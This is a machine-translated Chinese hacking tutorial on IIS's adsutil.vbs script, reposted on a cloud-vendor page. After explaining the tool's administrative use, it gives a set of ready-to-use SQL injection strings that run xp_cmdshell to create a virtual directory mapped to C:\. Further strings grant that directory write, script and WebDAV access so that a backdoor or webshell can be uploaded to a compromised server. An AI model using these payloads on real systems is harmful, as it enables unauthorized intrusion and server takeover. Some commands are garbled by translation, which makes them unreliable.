The use of adsutil. vbs in script attacks

Source: Internet
Author: User
Tags iis administration metabase
1. Brief Introduction
What is adsutil. vbs? I believe that the network manager who has used IIS will not know. This is a script provided by IIS for managing IIS under the command line. Located in the % systemdrive % \ Inetpub \ adminscripts directory. It must be 95,426 bytes in size. Such a large script has powerful functions. This is also true. Basically, I think it is an "Internet Information Service Manager" under the command line ". (In fact, more than 20 original vbs files under % systemdrive % \ Inetpub \ adminscripts are available for management on 2000 of servers. By 2003, only one adsutil. vbs is left. It is enough to explain how complicated its functions are)
When adsutil. vbs is mentioned, you have to mention metabase. Bin. This file is the most important configuration file for IIS. All IIS settings will be stored in this file. IIS manager and adsutil. vbs are displayed to users by reading configuration information for this file. The storage structure of metabase. Bin is very similar to the Registry and is a tree-type storage structure. IIS manager and adsutil. vbs access metabase. Bin through an adspath path. The path starts with IIS: \. localhost indicates the local server, and W3SVC indicates the IIS service. For example, IIS: \ localhost/w3svc/1 indicates the first web site on the local server. IIS: \ localhost/w3svc/1/root/vdir indicates the vdir virtual directory under the root directory of the first web site.
With this knowledge, let's go back to adsutil. vbs to see its usage:

C: \ Inetpub \ adminscripts> cscript adsutil. vbs // do not forget to enter the host file name of the script cscript.exe.
Microsoft (r) Windows Script Host version 5.6
Copyright (c) Microsoft Corporation 1996-2001. All rights reserved.

Usage:
Adsutil. vbs [[]

Description:
IIS administration utility that enables the configuration of metabase Properties
.

Supported commands: // supported commands. This is the most important
Get, set, Enum, delete, create, copy,
Appcreateinproc, appcreateoutproc, appcreatepoolproc, appdelete, appunload, AP
Pgetstatus

Samples: // a few simple examples
Adsutil. vbs get w3svc/1/serverbindings // view the port of the first virtual web site. W3svc/1 is short for IIS: \ localhostw3svc/1, while serverbindings is its attribute. The same below.
Adsutil. vbs set w3svc/1/serverbindings ": 81:" // set the port of the first virtual web site to 81.
Adsutil. vbs create w3svc/1/root/myvdir "iiswebvirtualdir" // create a virtual directory of myvdir under the root directory of the first virtual web site. The following "iiswebvirtualdir" indicates the directory type.
Adsutil. vbs start_server w3svc/1 // start the first virtual web site.
Adsutil. vbs Enum/P W3SVC // view all IIS sites.

For extended help type:
Adsutil. vbs help // If You Want To further view the help, type this command. I won't go around here. Prevent others from saying that I am making a draft fee. You can check it by yourself.

The text after "//" is the comments I added (the same below ). I believe this should be understandable.
The commonly used adsutil. vbs Commands include get, set, Enum, delete, and create. Now I will explain one by one:
The GET command is usually used to view the attribute values of directories. Set is used to set directory properties. Enum is also used to view attributes. The difference is that he directly displays all the set attributes. A directory usually has several pages to read... it has an optional "/P" toggle. If this switch is enabled. It will only list all virtual directories under this directory. The DELETE command is used to delete virtual directories. Create creates a virtual directory. There are also several commands: start_server, stop_server, pause_server, and continue _ server. Start, stop, pause, and continue the virtual site.
The approximate attribute values of a virtual directory are as follows (I only list the values that may be commonly used, otherwise they will be too long ):

Keytype: (string) "iiswebvirtualdir" // directory type. (string) indicates that it is a string type attribute.
Approot: (string) "/lm/w3svc/1/root" // directory IIS path
Appfriendlyname: (string) "Default Application Program "// Application name
Appisolated: (integer) 2 // specifies whether it is running outside the process or in the process. It is a numeric attribute.
Httpcustomheaders: (list) (1 items) // custom IIS data Header
"Powered by: www. wofeiwo. Info"

Httperrors: (list) (42 items) // various IIS Code The returned page. You can set it yourself. I will omit it here.
Defaultdoc: (string) "default.htm,index.htm, default. asp, in
Dex. asp, default. php, index. php, default. aspx, index. aspx "// The default homepage name of the directory.
Path: (string) "D: \ FTP" // physical path mapped to the directory
Accessflags: (integer) 513 // I don't know what it is. I have not set it. It seems that it will be set automatically.
Accessexecute: (Boolean) False // directory execution permission, which is a Boolean Value
Accesssource: (Boolean) False // whether WebDAV access to the directory is allowed
Accessread: (Boolean) True // read-only permission for the Directory
Accesswrite: (Boolean) False // directory write permission
Accessscript: (Boolean) True // whether script execution is allowed in the directory
Accessnoremoteexecute: (Boolean) False
Accessnoremoteread: (Boolean) False
Accessnoremotewrite: (Boolean) False
Accessnoremotescript: (Boolean) False
Accessnophysicaldir: (Boolean) False
Scriptmaps: (list) (27 items) // application extension ing
". Asa, c: \ windows \ system32 \ inetsrv \ ASP. dll, 5, get, Head, post, trace"
". Asp, c: \ windows \ system32 \ inetsrv \ ASP. dll, 5, get, Head, post, trace"
". Aspx, c: \ windows \ Microsoft. NET \ framework \ v1.1.4322 \ aspnet_isapi.dll, 1, get, hea
D, post, debug"
.................. // N multi-data is omitted here.
Aspenableparentpaths: (Boolean) True
Apppoolid: (string) "defaultapppool" // application pool name
Dontlog: (Boolean) True // disable iislog records
Dirbrowseflags: (integer)-1073741762.
Enabledirbrowsing: (Boolean) True // whether the column directory is allowed
Dirbrowseshowdate: (Boolean) True // here and below are the parameter settings for displaying directories. English is simple. I will not talk about it anymore.
Dirbrowseshowtime: (Boolean) True
Dirbrowseshowsize: (Boolean) True
Dirbrowseshowextension: (Boolean) True
Dirbrowseshowlongdate: (Boolean) True
Enabledefaultdoc: (Boolean) True // whether to enable the default homepage document

The above is what I saw on my machine using the cscript adsutil. vbs Enum w3svc/1/root command. You can also enter the preceding command to study the problem.
All the above attributes can be set through the set command. The method is as follows:
Cscript adsutil. vbs set w3svc/1/root/directory name/attribute name Setting Value
For example, cscript adsutil. vbs set w3svc/1/root/wofeiwo/accessread 1 // set the read permission of the wofeiwo virtual directory under the first virtual web site to true
Or: cscript adsutil. vbs set w3svc/1/root/wofeiwo/path "C: \" // set the directory ing path to "C :\"
Let's take a look at our simple examples.
Ii. Use of adsutil. vbs
(1) A new idea of MSSQL injection upload
You may encounter this situation in MSSQL injection: SA permission. Run the CMD command (xp_cmdshell, sp_oacreate, job, and so on ). However, the server is on the Intranet. Outside is a bastion host. Only port 80 is mapped. 3389 is useless (cannot be connected via intranet), and all reverse Trojans cannot be transferred (TFTP, FTP, wget, exe2bat, etc.). What should you do at this time?
Amanl's classic "squeeze the last drop of MSSQL blood" gives us a good idea: Create a new virtual directory using vbs under % systemdrive % \ Inetpub \ adminscripts. Customize the absolute path of the ing. In this way, the absolute path of the Web can be guessed. Then, back up the database or temporary table to the virtual directory (or directly echo) through backup or maskwebtask to get a shell.
The above idea is indeed good. However, anyone who has used getwebshell or nbupfile that is too bad to eat knows how low the success rate of backup or maskwebtask is ...... echo ...... I don't want to talk about it anymore. Writing one line in one row is simply looking for guilt. (Keep turning special characters ......)
In fact, we can improve the idea of amanl. When we create a new virtual directory. You can add the write directory permission. With WebDAV..., can we directly upload any files through IIS soon? It is not limited to text files. If we upload a reverse backdoor and execute it through SA ...... Haha, everything will be done!
Coming soon:
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs create w3svc/1/root/wofeiwo "iiswebvirtualdir "';--
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs cscript adsutil. vbs set w3svc/1/root/wofeiwo/path "C :\"';--
Note that the special characters above must be changed by yourself. Alternatively, you can run the preceding command using nbsi2.
In this way, a wofeiwo virtual directory is created under the first web site and mapped to the C: root directory. I added the read and write permissions to him. To get a webshell, I added the script execution permission:
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs set w3svc/1/root/wofeiwo/accessread 1 ';--
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs set w3svc/1/root/wofeiwo/accesswrite 1 ';--
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs set w3svc/1/root/wofeiwo/accessscript 1 ';--
A friend who has read surperhei's use of IIS write permission may want to construct an HTTP packet to upload files. In fact, there are simpler methods:
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs set w3svc/1/root/wofeiwo/enabledirbrowsing 1 ';--
Exec master.. xp_cmdshell 'cscript.exe % systemdrive % \ Inetpub \ adminscripts \ adsutil. vbs set w3svc/1/root/wofeiwo/accesssource 1 ';--
Set to allow access to the column directory and WebDAV, then open your IE, CTRL + O open the "open" dialog box, and type the virtual directory you just set. Select "open as web folder" and click OK.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.